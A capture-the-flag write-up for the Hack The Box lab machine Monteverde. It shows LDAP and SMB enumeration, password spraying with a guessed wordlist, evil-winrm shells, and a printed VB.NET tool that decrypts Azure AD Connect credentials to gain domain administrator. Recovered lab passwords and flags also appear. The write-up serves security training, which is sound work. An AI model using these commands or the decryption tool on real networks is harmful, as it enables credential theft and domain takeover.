They might call it the cloud but it is, in fact, just someone else’s computer.
Mark Russinovich
About Monteverde
In this post, I’m writing a write-up for the machine Monteverde from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Monteverde is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.
Foothold
After the portscan, I discovered that this box is the Domain Controller in the forest MEGABANK.local. Through the enumeration of the LDAP Protocol, I discovered several user accounts. With the Nmap LDAP scripts, I found the last login date and I ended up with three recent used accounts AAD_987d7f2f57d2, mhope and SABatchJobs. I found myself creating a wordlist with easy-to-guess passwords and with a brute-force attack on these accounts with CrackMapExec, I managed to get the password of the user SABatchJobs.
User
The user account SABatchJobs has the permissions to read the contents of the home directory of the user mhope. This directory contains a file, named azure.xml. This file contains the password for the user account mhope. As mhope has permission to create a WinRM session to this box, I have created an shell with evil-winrm to grab the user flag.
Root
In the enumeration to gain privilege escalation, I found out that the user mhope is a member of the Azure Admins group. This makes mhope Azure Administrator. As this box has the Azure AD Connect installed and there is a known vulnerability in this AAD version, which gives the possibility to decrypt the Administrator password from the SQL Database. I downlaoded the exploit, ran the exploit and with the decrypted Administrator password I was able to gain access to this box and read the root flag.
Machine Info
Recon
Port scan with Nmap
As always I start the enumeration with a portscan.
1
nmap -sC -sV -oA ./nmap/monteverde.txt 10.10.10.172
Output:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
Scanned at 2020-01-20 22:46:17 CET for 340s
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-20 20:57:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
| ssl-date:
|_ ERROR: Unable to obtain data from the target
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
| ssl-date:
|_ ERROR: Unable to obtain data from the target
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
| ssl-date:
|_ ERROR: Unable to obtain data from the target
3269/tcp open tcpwrapped
| ssl-date:
|_ ERROR: Unable to obtain data from the target
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/20%Time=5E261FCD%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -49m27s
| nbstat:
|_ ERROR: Name query failed: TIMEOUT
| smb-os-discovery:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-security-mode:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-20T20:59:53
|_ start_date: N/A
Final times for host: srtt: 243334 rttvar: 153575 to: 857634
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting runlevel 3 (of 3) scan.
NSE: Starting clock-skew.
NSE: Finished clock-skew.
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 340.57 seconds
Enumeration
User enumeration
Let’s start with enum4linux. I invoked this command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
~$ enum4linux 10.10.10.172
...
=============================
| Users on 10.10.10.172 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization
Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
...
...
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
...
...
[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
...
As the results is showing, there are some usernames discovered. First, I put these usernames in a separate file, with the name usernames.txt
I have created a short drawing to get the bigger picture:
- Trading (group)
- dgalanos (member)
- Operations (group)
- smorgan (member)
- HelpDesk (group)
- roleary (member)
- Azure Admins (group)
- Administrator (member)
- AAD_987d7f2f57d2 (member)
- mhope (member)
And some service accounts:
- svc-ata
- svc-bexec
- *vc-netapp
Last but not least, an Azure Sync account. Because the name suggests so. AAD usually stands for Azure Active Directory:
- AAD_987d7f2f57d2
With this information, I learned that there is probably an AAD Sync to Azure. I do not know if I have to use this information, but I need to keep this in mind.
User logondate enumeration
An active user account generally contains more usable data than an inactive user account. Through Kerberos, I first tried to obtain this information, but I was unsuccessful. I try it via LDAP. Nmap has some useful scripts for enumeration through LDAP.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
~$ nmap -p 389 --script ldap-search --script-args 'ldap.qfilter=users,ldap.attrib={sAMAccountName, lastlogon}' 10.10.10.172
PORT STATE SERVICE
389/tcp open ldap
| ldap-search:
| Context: DC=MEGABANK,DC=LOCAL; QFilter: users; Attributes: sAMAccountName,lastlogon
| dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
| sAMAccountName: Guest
| dn: CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
| lastLogon: 2020-01-21T16:21:25+00:00
| sAMAccountName: MONTEVERDE$
| dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
| lastLogon: 2020-01-21T15:23:33+00:00
| sAMAccountName: AAD_987d7f2f57d2
| dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
| lastLogon: 2020-01-21T18:07:51+00:00
| sAMAccountName: mhope
| dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
| lastLogon: 2020-01-21T16:53:24+00:00
| sAMAccountName: SABatchJobs
| dn: CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
| sAMAccountName: svc-ata
| dn: CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
| sAMAccountName: svc-bexec
| dn: CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
| sAMAccountName: svc-netapp
| dn: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
| sAMAccountName: dgalanos
| dn: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
| sAMAccountName: roleary
| dn: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
| lastLogon: Never
|_ sAMAccountName: smorgan
The output is showing all the user accounts with the last login date, there are three users who are currently active in use. For my further enumeration, I focus on these three user accounts.
| SamAccountName | lastlogon |
|---|---|
| AAD_987d7f2f57d2 | 2020-01-21T15:23:33+00:00 |
| mhope | 2020-01-21T18:07:51+00:00 |
| SABatchJobs | 2020-01-21T16:53:24+00:00 |
Intrusion
Password guessing game
I’ve got now three usernames, but no passwords. I tried in several ways to get a password, but I have not succeeded. Based on the information I have until now, I can create a small wordlist with very known passwords. When a lazy administrator has configured the user accounts with the passwords maybe I got a chance to brute-force one of the user accounts. So, it turns out that I’ve entered a password guessing game…
I’ve built a list with easy-to-guess passwords and add these passwords to the passwords.txt file. This is my easy-to-guess password list:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
P@ssw0rd
p@ssw0rd
mhope
epohm
Mhope
Mh0pe
user123
megabank
Megabank
megabank@2
Megabank@2
AAD_987d7f2f57d2
2d75f2f7d789_DAA
SABatchJobs
SABatchJobs
hope
Hope
h0pe
H0pe
h0p3
H0p3
hope123
Hope123
welcome
Welcome
welcome!1
Welcome!1
welcome@2
Welcome@2
987d7f2f57d2
AAD_987d7f2f57d2
abc123
12345678
1234567
123456@2
123456@
qwerty
monkey
letmein
dragon
111111
baseball
iloveyou
trustno1
sunshine
master
123123
shadow
Ashley
football
Michael
ninja
mypassword
Mypassword
pass123
Pass123
password
Password
password123
Passwod123
password1
Password1
P@ssword!1
p@ssword!
p@assword!1
password@2
Password@2
P@ssword123
Ok, now I can start guessing with CrackMapExec. I have added the three usernames to my scope. Let’s start the guessing game.
1
2
3
~$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p passwords.txt
CME 10.10.10.172:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME 10.10.10.172:445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJobs
And after a while I managed to get an password. The Administrator who has configured this account was very lazy.
Enumerate shares
I’ve tried to get a shell with the tool evil-winrm but received a WinRM::WinRMAuthorizationError error message. So, the next step is to try to enumerate further through the shares
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
~$ smbmap -u SABatchJobs -p SABatchJobs -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
.
dr--r--r-- 0 Fri Jan 3 13:43:36 2020 .
dr--r--r-- 0 Fri Jan 3 13:43:36 2020 ..
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
.
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 InitShutdown
fr--r--r-- 5 Mon Jan 1 00:19:32 1601 lsass
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 scerpc
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-3b4-0
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 epmapper
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-1f0-0
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 eventlog
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-4b4-0
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 atsvc
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-6b8-0
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-28c-0
fr--r--r-- 4 Mon Jan 1 00:19:32 1601 wkssvc
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-28c-1 [7/676]
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 RpcProxy\49669
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 ab7a144f9d8123c3
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 RpcProxy\593
fr--r--r-- 4 Mon Jan 1 00:19:32 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 spoolss
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-b78-0
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 netdfs
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 vgauth-service
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-278-0
fr--r--r-- 3 Mon Jan 1 00:19:32 1601 SQLLocal\MSSQLSERVER
fr--r--r-- 2 Mon Jan 1 00:19:32 1601 sql\query
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-bc8-0
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 PSHost.132241953372355013.5932.DefaultAppDomain.wsmprovhost
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 CPFATP_6128_v4.0.30319
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 PSHost.132241953566831249.6128.DefaultAppDomain.miiserver
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 GoogleCrashServices\S-1-5-18
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 GoogleCrashServices\S-1-5-18-x64
fr--r--r-- 1 Mon Jan 1 00:19:32 1601 Winsock2\CatalogChangeListener-be4-0
IPC$ READ ONLY Remote IPC
.
dr--r--r-- 0 Thu Jan 2 23:05:27 2020 .
dr--r--r-- 0 Thu Jan 2 23:05:27 2020 ..
NETLOGON READ ONLY Logon server share
.
dr--r--r-- 0 Thu Jan 2 23:05:27 2020 .
dr--r--r-- 0 Thu Jan 2 23:05:27 2020 ..
dr--r--r-- 0 Thu Jan 2 23:05:27 2020 MEGABANK.LOCAL
SYSVOL READ ONLY Logon server share
.
dr--r--r-- 0 Fri Jan 3 14:12:48 2020 .
dr--r--r-- 0 Fri Jan 3 14:12:48 2020 ..
dr--r--r-- 0 Fri Jan 3 14:15:23 2020 dgalanos
dr--r--r-- 0 Fri Jan 3 14:41:18 2020 mhope
dr--r--r-- 0 Fri Jan 3 14:14:56 2020 roleary
dr--r--r-- 0 Fri Jan 3 14:14:28 2020 smorgan
users$ READ ONLY
I’ve established a connection to the users$ share and found in the user account directory of the user account mhope an interesting file called azure.xml.
1
2
3
4
5
6
7
8
smb: \mhope\> pwd
Current directory is \\10.10.10.172\users$\mhope\
smb: \mhope\> ls
. D 0 Fri Jan 3 14:41:18 2020
.. D 0 Fri Jan 3 14:41:18 2020
azure.xml AR 1212 Fri Jan 3 14:40:23 2020
524031 blocks of size 4096. 519955 blocks available
I downloaded this file to my localhost and checked his contents.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
~$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
There is a password listed in this file 4n0therD4y@n0th3r$. As this file is listed in the directory of the user account mhope. I assume that this is the password of the account mhope. With the tool evil-winrm, I’ve created a shell to the box. Now I can grab the user flag.
1
2
3
4
~$ evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
Privilege Escalation
Enumeration
I have a shell as the user mhope. I want to enumerate further to get Administrator privileges. As I know that this box has an AAD Sync with Azure, there has to be an Azure Admins group listed on this box. I invoked the command below to get the members of this group:
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\mhope\Documents> net group "azure admins" /domain
Group name Azure Admins
Comment
Members
-------------------------------------------------------------------------------
AAD_987d7f2f57d2 Administrator mhope
The command completed successfully.
And it seems that the user account mhope is a member of the Azure Admins, which makes this user account an Azure Admin! For sure, I have checked if that Microsoft Azure Directory Connect is installed on the server. Further, I see that Windows Defender Advanced Threat Protection also is installed. So, there’s antivirus software installed out there that I need to keep an eye on.
1
2
3
4
5
6
7
8
Evil-WinRM* PS C:\Program Files> ls
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
The Microsoft Azure AD Sync needs to have Administrator privileges to work properly, the Administrator-account credentials need to be stored somewhere. After some searching on Google, I found an interesting article (https://blog.xpnsec.com/azuread-connect-for-redteam/) and a great video(48min) on YouTube (https://www.youtube.com/watch?v=JEIR5oGCwdg).
Azure AD Connect Database Exploit
With the information I found online, I searched further on the internet for an article (https://vbscrub.video.blog/2020/01/14/azure-ad-connect-database-exploit-priv-esc/) which contains a VBscript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
Imports Microsoft.DirectoryServices.MetadirectoryServices.Cryptography
Imports System.Data.SqlClient
Imports System.Xml
Module MainModule
Sub Main()
Try
Console.WriteLine(Environment.NewLine & "======================" & Environment.NewLine &
"AZURE AD SYNC CREDENTIAL DECRYPTION TOOL" & Environment.NewLine &
"Based on original code from: https://github.com/fox-it/adconnectdump" & Environment.NewLine &
"======================" & Environment.NewLine)
Dim SqlConnectionString As String = "Data Source=(LocalDB)\\.\\ADSync;Initial Catalog=ADSync;Connect Timeout=20"
If My.Application.CommandLineArgs.Count > 0 AndAlso String.Compare(My.Application.CommandLineArgs(0), "-FullSql", True) = 0 Then
SqlConnectionString = "Server=LocalHost;Database=ADSync;Trusted_Connection=True;"
End If
Dim KeyId As UInteger
Dim InstanceId As Guid
Dim Entropy As Guid
Dim ConfigXml As String
Dim EncryptedPasswordXml As String
Using SqlConn As New SqlConnection(SqlConnectionString)
Try
Console.WriteLine("Opening database connection...")
SqlConn.Open()
Using SqlCmd As New SqlCommand("SELECT instance_id, keyset_id, entropy FROM mms_server_configuration;", SqlConn)
Console.WriteLine("Executing SQL commands...")
Using Reader As SqlDataReader = SqlCmd.ExecuteReader
Reader.Read()
InstanceId = DirectCast(Reader("instance_id"), Guid)
KeyId = CUInt(Reader("keyset_id"))
Entropy = DirectCast(Reader("entropy"), Guid)
End Using
End Using
Using SqlCmd As New SqlCommand("SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'", SqlConn)
Using Reader As SqlDataReader = SqlCmd.ExecuteReader
Reader.Read()
ConfigXml = CStr(Reader("private_configuration_xml"))
EncryptedPasswordXml = CStr(Reader("encrypted_configuration"))
End Using
End Using
Catch Ex As Exception
Console.WriteLine("Error reading from database: " & Ex.Message)
Exit Sub
Finally
Console.WriteLine("Closing database connection...")
SqlConn.Close()
End Try
Try
Console.WriteLine("Decrypting XML...")
Dim CryptoManager As New KeyManager
CryptoManager.LoadKeySet(Entropy, InstanceId, KeyId)
Dim Decryptor As Key = Nothing
CryptoManager.GetActiveCredentialKey(Decryptor)
Dim PlainTextPasswordXml As String = Nothing
Decryptor.DecryptBase64ToString(EncryptedPasswordXml, PlainTextPasswordXml)
Console.WriteLine("Parsing XML...")
Dim Domain As String = String.Empty
Dim Username As String = String.Empty
Dim Password As String = String.Empty
Dim XmlDoc As New XmlDocument
XmlDoc.LoadXml(PlainTextPasswordXml)
Dim XmlNav As XPath.XPathNavigator = XmlDoc.CreateNavigator
Password = XmlNav.SelectSingleNode("//attribute").Value
XmlDoc.LoadXml(ConfigXml)
XmlNav = XmlDoc.CreateNavigator
Domain = XmlNav.SelectSingleNode("//parameter[@name='forest-login-domain']").Value
Username = XmlNav.SelectSingleNode("//parameter[@name='forest-login-user']").Value
Console.WriteLine("Finished!" &
Environment.NewLine & Environment.NewLine &
"DECRYPTED CREDENTIALS:" & Environment.NewLine &
"Username: " & Username & Environment.NewLine &
"Password: " & Password & Environment.NewLine &
"Domain: " & Domain & Environment.NewLine)
Catch ex As Exception
Console.WriteLine("Error decrypting: " & ex.Message)
End Try
End Using
Catch ex As Exception
Console.WriteLine("Unexpected error: " & ex.Message)
End Try
End Sub
End Module
I downloaded the AdDecrypt.exe to my local machine along with the mcrypt.dll file. On the box, I created the folder C:\.enum and uploaded the files to this folder.
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> upload AdDecrypt.exe
Info: Uploading AdDecrypt.exe to C:\Program Files\Microsoft Azure AD Sync\Bin\AdDecrypt.exe
Data: 19796 bytes of 19796 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> upload mcrypt.dll
Info: Uploading mcrypt.dll to C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll
Data: 445664 bytes of 445664 bytes copied
Info: Upload successful!
When the upload was finished. I set the directory C:\Program Files\Microsoft Azure AD Sync\Bin as my working directory and execute this command:
1
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\.enum\AdDecrypt.exe
And… the script is running and decrypting the Administrator password from the SQL database:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\.enum\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin>
I now have the credentials of the Administrator-account. I can now create an evil-winrm connection:
1
~$ evil-winrm -u administrator -p d0m@in4dminyeah! -i 10.10.10.172
Grab the root.txt flag and I have rooted this box.
1
2
3
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Thanks for reading my write-up of Monteverde. I’ve really enjoyed hacking this box! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!
Happy Hacking :-)